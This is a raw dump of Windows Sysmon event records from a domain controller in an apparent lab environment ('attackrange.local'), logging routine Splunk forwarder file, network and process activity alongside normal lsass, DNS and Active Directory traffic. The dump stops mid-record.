23542300x80000000000000002201874Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:53.389{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7C1799EA4CB06B1024E9F694F489E0,SHA256=AB9FB73AE16D10C2D06F8CA3C3EFA9EB21F8E921AED90D386D8724ECDC095D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201878Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:54.874{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B519C0212F7388CAF45D5008F2F396B,SHA256=464B1BE5F17936F4B6AA985CB93555AD0DD61CEAC29373C9E57B4A051E85D117,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201877Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:50.976{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60587-false10.0.1.12-8000- 23542300x80000000000000002201883Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:55.874{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A4D41A9A39638536A15F977AF15975A,SHA256=DC0F381A8BCE380C60E44B30BCA9DC13AB14BA5D0F759646D9DD3B537DE2F0ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201882Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:52.462{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60588-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002201881Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:52.462{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60588-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 23542300x80000000000000002201880Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:55.733{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4553A0E7014F0D7BE0A790ED3E926EC4,SHA256=93F57EDDCA77F794045FB3C773D6277808A51996E49261FD3F3BF5DEBE1AE2C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201879Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:51.209{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60056- 23542300x80000000000000002201884Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:56.889{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9009F75A2A0406333E8BEC60855FE35F,SHA256=39E86B207A6E4FE2F33280BBC8D494C082B5763B726881224C8F9004E07F3BB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201888Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:57.889{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A29A376BA48AA7D4B3B42A95B57092F,SHA256=FE622DA3A195C1340575520B7E035FBE195170A1A66180C2F05AA533BCCE94D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201887Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:53.867{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60589-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201886Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:53.866{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60589-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002201885Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:57.108{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBCB18CDF7FF4015CB0852361EC34805,SHA256=0510754E9BFA344973CE0CF4CF797C14639446B33A913D18C457FB724ED270B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201890Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:58.889{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAC6A3D42E887D1649FC90B5026E4BDB,SHA256=7493BE7848003F1022BF539BF277EEB14B2AD2F8B0D6F856DFA6DF5A31E5DD29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201889Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:54.228{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51371-true2001:500:2:0:0:0:0:cc.root-servers.net53domain 23542300x80000000000000002201893Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:59.905{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFF798047378DC1B5C400EA91ECEAFF,SHA256=0B4972D82CEB394961F87D0C2DB7AF7D32E6100697D821FD949FA3E178C938BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201892Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:56.007{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60590-false10.0.1.12-8000- 23542300x80000000000000002201891Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:59.202{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4ECDBA0B8FE393DCCFDFA3515920464,SHA256=955890D49BE708FAD1CC1FE3A33CD2A7D00C166EE9B53D03A94D1514ADB7C9DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201894Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:00.921{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=148F443283C289B689F70EF54BDC3E39,SHA256=1FFC15F1FA32491B9A4273AB7DF63E10CB7E1DF5CD975765E00D3B09D6BDEAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201896Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:01.936{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81EBC20EEB4A5927E079153E50FD3ADA,SHA256=DAB8F33DE94088F827CFAAA7FDF924E1B98FE75C53927B6FB9D860D0A2F43FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201895Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:01.421{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671B0ED5008DF39D590F420B2ACA0581,SHA256=C2A3095AEF222D9F9FEA27EF20D4F01017702783996182BDC7BFC7299A5399A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201913Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.952{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C97A1EB81091432EEA446BFDAAA6BD3C,SHA256=95F3C4B0F1212F8EF19D9BEA4156B9CB1804481E91E42482DEF0CE30D5C60B55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201912Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E81E-6040-114E-00000000AD01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201911Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201910Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201909Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201908Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201907Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E81E-6040-114E-00000000AD01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201906Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.827{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E81E-6040-114E-00000000AD01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201905Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.828{5ABCFE62-E81E-6040-114E-00000000AD01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201904Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E81E-6040-104E-00000000AD01}4472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201903Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201902Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201901Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201900Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201899Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E81E-6040-104E-00000000AD01}4472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201898Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.155{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E81E-6040-104E-00000000AD01}4472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201897Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:02.156{5ABCFE62-E81E-6040-104E-00000000AD01}4472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201924Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.968{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B885A988BC0BE7C82E65EE49740C4B73,SHA256=35CBF06F38B0EC12A5A1AC4C53B951365CEA7A5D23504A30BFF2CD0E6F90A508,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201923Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.514{5ABCFE62-E81F-6040-124E-00000000AD01}33845160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 